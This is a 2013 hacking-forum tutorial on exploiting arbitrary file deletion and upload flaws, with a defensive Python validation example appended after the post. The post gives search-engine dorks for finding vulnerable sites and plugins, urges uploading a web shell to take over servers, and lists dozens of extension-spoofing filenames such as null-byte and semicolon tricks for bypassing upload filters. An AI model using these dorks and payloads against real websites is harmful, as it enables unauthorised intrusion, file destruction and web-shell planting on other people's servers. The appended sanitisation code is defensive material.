Arbitrary file deletion and upload 01-25-2013, 07:12 PM
Arbitrary file delete and upload
I will write a little tutorial about arbitrary file deleting and uploading.
Ok, let's start with what those arbitrary files are. Well, those files give you the right to modify anything on the system. You can find this vulnerability in sites without. It's really hard to find those vulnerabilities on a targeted site, but you can still use it on some random ones.
Arbitrary file delete
This is a file that gives you the rights to delete any file on the website. Here are dorks to find vulnerable sites:
Code:
inurl:"delete.php?file=" ext:php
inurl:"delete?filename=" ext:php
inurl:"action=delete?file=" ext:php
Now let's say you have found a vulnerable website; at the end of the URL you should see something like ../delete.php?file=
boom
Arbitrary file upload
Basically this is uploading a file (you should upload a shell to hack it =D) on the server by using an arbitrary file.
Ok, first here are some dorks to find vulnerable sites:
Code:
inurl:"upload.php?file=" ext:php
inurl:"upload?filename=" ext:php
inurl:"action=upload?file=" ext:php
inurl:wp-content/plugins/sfbrowser/connectors/php/
intext:"CMS Etiko"
inurl:wp-content/plugins/pica-photo-gallery/
inurl:"default_image.asp"
inurl:"default_imagen.asp"
inurl:"/box_image.htm"
inurl:"/plugins/ImageManager/manager.php"
Now you should see an upload form. First try to upload your shell, but if it fails then try with extension spoofing; here are some spoofs:
Code:
shell.php;.jpg
shell.php..jpg
shell.php.jpg;
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%00
shell.php%00.jpg
shell.php.jpg;%00
shell.php.jpg%00:;
shell.php;.png
shell.php..png
shell.php.png;
shell.php.png:;
shell.php.png%;
shell.php.png%00
shell.php%00.png
shell.php.png;%00
shell.php.png%00:;
shell.php;.gif
shell.php..gif
shell.php.gif;
shell.php.gif:;
shell.php.gif%;
shell.php.gif%00
shell.php%00.gif
shell.php.gif;%00
shell.php.gif%00:;
shell.php;.txt
shell.php..txt
shell.php.txt;
shell.php.txt:;
shell.php.txt%;
shell.php.txt%00
shell.php%00.txt
shell.php.txt;%00
shell.php.txt%00:;
Those are the only spoofed extensions I found on the internet; if anybody knows more, post them.
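As an added example (not from the post above), here is the defensive counterpart in Python: the checks a file handler needs so that none of the spoofed names listed above, nor a traversal path sent to a delete endpoint, gets through. The upload directory path and the allow-list are assumptions.

```python
# Added example, not code from the post: server-side checks for the two
# handler types discussed (file upload and file delete).
import os
import re
import urllib.parse
from typing import Optional

ALLOWED_EXTENSIONS = {"jpg", "png", "gif", "txt"}   # allow-list, never a deny-list (assumed)
UPLOAD_ROOT = "/var/www/uploads"                    # assumed storage directory
# Exactly one dot, alphanumerics only: ';', '%', ':', '\x00' and '..' can never match.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


def safe_upload_name(raw_name: str) -> Optional[str]:
    """Return a normalised filename if acceptable, else None.

    The name is percent-decoded first so that %00 / %3B are judged on their
    decoded bytes, any directory part is dropped, and the extension must be
    on the allow-list after lower-casing (so Photo.JPG becomes Photo.jpg).
    """
    name = os.path.basename(urllib.parse.unquote(raw_name))
    m = SAFE_NAME.fullmatch(name)
    if m is None:
        return None
    ext = m.group(1).lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return name[: -len(m.group(1))] + ext


def safe_delete_path(requested: str, root: str = UPLOAD_ROOT) -> Optional[str]:
    """Resolve a user-supplied name inside root; None if it escapes or is malformed."""
    name = urllib.parse.unquote(requested)
    if not name or "\x00" in name:          # null bytes truncate paths in C-based runtimes
        return None
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, name))   # collapses ../ and symlinks
    if target == root_real or os.path.commonpath([root_real, target]) != root_real:
        return None
    return target


if __name__ == "__main__":
    # Constructed inputs taken from the spoof list above plus two benign names.
    for candidate in ["photo.jpg", "shell.php;.jpg", "shell.php%00.jpg", "shell.php.gif%00:;"]:
        print(f"{candidate!r:24} -> {safe_upload_name(candidate)}")
    for candidate in ["report.txt", "../config.php", "/etc/passwd"]:
        print(f"{candidate!r:24} -> {safe_delete_path(candidate)}")
```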
Arbitrary file deletion and upload - by Synchro - 01-25-2013, 07:12 PM